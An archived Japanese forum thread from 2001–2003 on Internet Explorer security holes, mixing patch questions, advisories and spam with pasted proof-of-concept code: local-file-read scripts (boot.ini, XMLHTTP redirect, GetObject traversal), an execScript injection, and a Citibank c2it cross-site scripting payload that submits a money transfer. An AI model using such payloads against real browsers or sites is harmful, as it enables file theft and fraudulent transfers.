http://memo.st.ryukoku.ac.jp/archive/200112.month/2392.html
<script>
var x=window.open('file://C:/boot.ini');
x.navigate("javascript:alert(document.body.innerText)");
</script>
−−−−−
http://memo.st.ryukoku.ac.jp/archive/200112.month/2396.html
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to=''
attributeName=document.parentWindow.execScript(scr1.innerHTML), set1.outerHTML />
</noscript>
−−−−−

308 :Internet Explorer 6 Allows Local File Reading (XMLHTTP):01/12/28 19:37
http://www.securiteam.com/windowsntfocus/6W00D2K3FS.html
http://www.xs4all.nl/~jkuperus/bug.htm
<html>
<head>
<title>Exploit</title>

<scr!pt language="jscript">

function doIt() {

// open the file on the users harddisk using a http redirect

var xmlhttp = new ActiveXObject ("Microsoft.XMLHTTP");
xmlhttp.Open("GET", "servlet/RedirectServlet?fileName=c:/jelmer.txt", false);
xmlhttp.Send();

alert(xmlhttp.responseText);

}

</script>
</head>
<body>

<button onclick="doIt()">Do it</button>

</body>
</html>

309 :名無しさん@お腹いっぱい。:01/12/28 21:31
xmlhttpってやばそうだね。

310 :名無しさん@お腹いっぱい。:01/12/28 22:38
全レスは読みました。
5.01から5.5sp2にしたのですが
バージョン:5.50.4807.2300
更新バージョン:SP2;Q312461;Q313675;
こうなりました。
ログを読む限りこれで問題なさそうなんですが、
診断君などの環境変数チェッカーサイトにいくと
UAが(compatible; MSIE 5.5; Windows 98; T312461)と出ます。
Q313675とついてないとダメじゃありませんでした?
これで大丈夫なんでしょうか?

http://www.microsoft.com/japan/enable/products/security/default.asp
で、順番通り1、2、3と全部インストしていったのですが
ログを読むと3番目が累積プログラムだからそれだけインストすればよかったとありました。
だからなんでしょうか。

311 :名無しさん@お腹いっぱい。:01/12/29 02:12
>>301
DNSパケやり取りしてるだけかと思われ。。。
でもOpera等はlistenしてないよ(T_T)

312 :名無しさん@お腹いっぱい。:01/12/29 02:33
>>311
シッタカすんなって。
301はポート不特定って書いてるだろーが。
ちなみに俺が調べた範囲ではローカルのファイルを読む場合では発生せず、
リモートのページを読むたびに出している模様。ポートは1025以上で一定だが
IEを再起動させるたびに別ポートになる。
ウイルスチェックには引っかからず。

ちなみにインストールする前のセットアップファイルはウイルスチェックには
引っかかった(w

313 :こっちにも、あけましておめでとう!:02/01/01 01:19
空けましておめでとうございます、今年もインターネットエクスプローラー
並びにWindowsのセキュリティーホール&欠陥をよろしくお願いいたします。

314 :名無しさん@お腹いっぱい。:02/01/03 15:37
AppVer.6.0.2600.0 ModName:kernel32.dll ModVer:4.10.0.2222 Offset:0001ad99

昨年12月、5.01sp2から6.0.2600.000IC 更新ver;Q313675;に変えたら
こんなエラーが出るようになった。なんか貰ったんでしょうか?

315 :名無しさん@お腹いっぱい。:02/01/03 15:41
>>310
うちもUAはそうなっとる。問題ないでしょ。
ちゃんと修正プログラム当てたんなら大丈夫。

316 :314:02/01/04 16:42
問題なし夫ちゃん?

317 :310:02/01/04 18:13
>>315
ありがとうございました(*´ー`*)
年末から返答を待っていたので嬉しかったです。

318 :過去レス読んだけど:02/01/04 22:42
NIS入れてから2ch書き込めない
IE6使ってます
エラー ぶらうざが変ですよん。って出ます。???

319 :IE GetObject() problems:02/01/05 03:10
ttp://msgs.securepoint.com/cgi-bin/get/bugtraq0201/1/2/1.html

ローカルにあるファイルを読まれるモヨン。
もしかしたら任意のプログラムを実行するかも。
とりあえずWin2k+IE5.01sp2は問題なかった。

320 ::02/01/05 12:29
週刊セキュホールと化してるな>IE

321 :名無しさん@お腹いっぱい。:02/01/09 23:43
>>241
それって有効にしてもセキュリティには問題ないですか?

322 :名無しさん@お腹いっぱい。:02/01/10 00:58
[関連スレ]

悪の根源「IE」を削除するスレ
http://pc.2ch.net/test/read.cgi/sec/1001060569/l50

323 :名無しさん@お腹いっぱい。:02/01/10 05:10
あーあーあーあーあ
https://www.netsecurity.ne.jp/article/1/3681.html

324 :名無しさん@お腹いっぱい。:02/01/10 06:32
だからActiveXもJAVAもJavaScriptもCSSも見捨ててネスケ使えとあれほど

325 :駄目じゃん:02/01/10 21:19
>323
>もっとも効果的な対処方法は、IE を使用しないことである。

326 :名無しさん@お腹いっぱい。:02/01/11 02:21
5.5Sp2にパッチを当てたら、送信バイト数が以前の倍くらいになってしまったんですが、
これっておかしいんでしょうか?

327 :BugTraq ID: 3767 :02/01/11 02:40
Microsoft Internet Explorer GetObject File Disclosure Vulnerability
BugTraq ID: 3767
リモートからの再現性: あり
公表日: Jan 01 2002 12:00A
関連するURL:
http://www.securityfocus.com/bid/3767
まとめ:

Microsoft Internet Explorer には、リモートの攻撃者が攻撃対象のコンピュー
タ内に存在する既知のファイルを、このソフトウェアの利用者が特別に組み立
てられたスクリプトを含む Web コンテンツを参照する際、閲覧できてしまう問
題が推察されている。

JScript の関数、GetObject() が ActiveX object 'htmlfile' と組み合わせて
利用される際に問題は発生する。この際、../ を含む URL が関数の最初の引数
として渡された場合、Microsoft Internet Explorer は生成された HTML 文書
オブジェクトの DOM に対し、どの様なアクセスであっても許可されてしまうの
である。

例:
a=GetObject("http://"+location.host+"/../../../../../../test.txt","htmlfile");

この問題により、悪意ある Web サイトの管理者による、攻撃対象のコンピュー
タ内に存在するいかなるファイルに対する内容の入手が可能になってしまうの
である。なお、この問題は任意のコードの実行も可能にすると推察される。

328 :未解決!シティバンク:02/01/11 02:42
未解決!シティバンクのオンラインサイトにクロスサイトスクリプティング問題
http://www.zdnet.co.jp/enterprise/0201/09/02010913.html

https://www.c2it.com/C2IT/SendCash
<script> setTimeout("alert(document.forms[0].SRC_ACCOUNT.options[1].value)", 400); </script>
--
<script>
w=window.open("SendCash", "s","");
setTimeout("f=w.document.forms[0];f.DEST_EMAIL.value='u@you.com';
f.AMOUNT.value=10;f.submit();",15000);
setTimeout("w.document.forms[0].submit();", 15000);
</script>
---
http://www.devitry.com/c2it-security.html

329 :名無しさん@お腹いっぱい。:02/01/11 14:17
WindowsUpDateのサイトって今おかしくなってない?

穴も埋められね〜よ。

330 :名無しさん@お腹いっぱい。:02/01/11 15:01
>>329
そこの情報は古いから、最新パッチをあてようと思うなら自分で巡回して収集したほうがいいぞ

331 :329:02/01/11 18:46
>>330
どうも。
↓で済ませました。
http://www.microsoft.com/japan/enable/products/security/

確かにWindowsUpDateでやるより良い。内容もちゃんと分かるし。

332 :名無しさん@お腹いっぱい。:02/01/13 23:44
ウイルスバスター2002を使ってます。IE6をアップデイト(Q313675)
してからだと思うのですが、バスターのアップデイトのたびに「IEに問題が
発生しましたので・・・」と表示され、IEが使用不能になります。
再起動しないとだめです。どこがおかしいのでしょうか?

333 :名無しさん@お腹いっぱい。:02/01/13 23:52
というわけで期待のブラウザ「opera」を使いましょう!!

334 :名無しさん@お腹いっぱい。:02/01/14 02:46












335 ::02/01/19 11:43
こっちにも貼って置く。
http://www.zdnet.co.jp/news/0201/16/e_ie.html
cookieを使って個人の識別ができるというものらしい。

336 :名無しさん@お腹いっぱい。:02/01/24 16:34
Microsoft Internet explorer は
PopUp オブジェクトを適切に処理できないことが原因で、
弱点が存在します。攻撃者にこの弱点を利用された場合、
リモートからシステムのアプリケーションを実行される可能性があります。

http://sid.softek.co.jp/loPrint.html?vg=1&htmlid=975

337 :名無しさん@お腹いっぱい。:02/02/12 17:58
 米Microsoftは米国時間2月11日,Internet Explorer(IE)の6種類の新しいセキュリティ・
ホールを公表するとともに,それらを修正する“累積”パッチを公開した。6種類のうち最も
深刻なセキュリティ・ホールを悪用されると,WebページやHTMLメールを閲覧しただけで,
仕込まれた任意のコードを実行してしまう恐れがある。IE 5.01 SP2/5.5 SP1/5.5 SP2/6
用のパッチが公開されているので,IEユーザーは適用する必要がある。ただし,IE 5.01
SP2 については Windows 2000 用のパッチだけが公開されている。

 今回公開されたセキュリティ・ホールは以下の6種類。

(1)Buffer Overrun in HTML Directive
(2)File Reading via GetObject function
(3)File Download Dialogue Spoofing via Content-Type and Content-Disposition fields
(4)Application invocation via Content-Type field
(5)Script execution
(6)Frame Domain Verification Variant via Document.Open function

 このうち,(1)と(2)および(6)については,IE 5.5/6 で「深刻度」が「最大(Critical)」と
されている。IE 5.01 は(1)と(5),(6)の影響を受けない。ただし,(1)から(6)のすべてを
合わせた深刻度は,IE 5.01/5.5/6 のいずれでも最大とされており,米Microsoftは
IEユーザーに対して,早急にパッチを適用することを勧めている。

 米Microsoftのページに,日本語版用のパッチも用意されている。「Select Language」で
「Japanese」を選択すればダウンロードできる。パッチの適用条件は,IE 5.5 の場合は,
SP1 か SP2 を適用済み,IE 5.01 の場合には,SP2 を適用済みで,なおかつ OS が
Windows 2000である必要がある。また,IE 5.01 SP2 よりも古いバージョンではテスト
していないので,影響を受けるかどうかは不明であるとしている。

ソース: http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020212/2/


338 :名無しさん@お腹いっぱい。:02/02/12 18:05
あげとく

339 :名無しさん@お腹いっぱい。:02/08/27 09:56
>>338
げとく

340 :名無しさん@お腹いっぱい。:02/10/24 03:55
340

341 :山崎渉:03/01/15 16:02
(^^)

342 :山崎渉:03/01/16 04:04
(^^)

343 :名無しさん@お腹いっぱい。:03/02/15 21:56
age

344 :名無しさん@お腹いっぱい。:03/02/15 23:01
今日はage荒らしが多いな…

IE5・5と6・0、ネット閲覧ソフトに欠陥
http://pc.2ch.net/test/read.cgi/sec/1005605775/l50
OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法
http://pc.2ch.net/test/read.cgi/sec/1021363841/l50

345 :山崎渉:03/04/17 12:27
(^^)

346 :山崎渉:03/04/20 06:09
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

347 :山崎渉:03/05/22 02:13
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

348 :山崎渉:03/05/28 17:18
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

349 :名無しさん@お腹いっぱい。:03/05/28 19:55
初心者ですみません。ADSLで常時接続にすると
ファイァーウォールというものを設定しないと
危険なのででしょうか 当方シマンテックのノートンを持ってますが
この中にあるのでしょうか?

350 :名無しさん@お腹いっぱい。:03/05/28 20:02
>>349
Nortonと言ってもOfficeのように数種類あるから
パッケージ名を書け。
つか、わざわざ買わなくても、同等の機能を持つフリーソフトのほうが財布には優しいぞw

351 :_:03/05/28 20:10
http://homepage.mac.com/hiroyuki43/hankaku01.html

352 :名無しさん@お腹いっぱい。:03/06/14 11:40
また穴が開いたのかぁ〜

353 :山崎 渉:03/07/15 11:13

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

354 :ぼるじょあ ◆yBEncckFOU :03/08/02 05:18
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

355 :山崎 渉:03/08/15 23:02
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

356 :名無しさん@お腹いっぱい。:03/10/08 01:27
\uff3f\u007c\uffe3\u007c\u25cb

357 :(・∀・)チンコー:03/10/27 20:18
マンコー

86 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)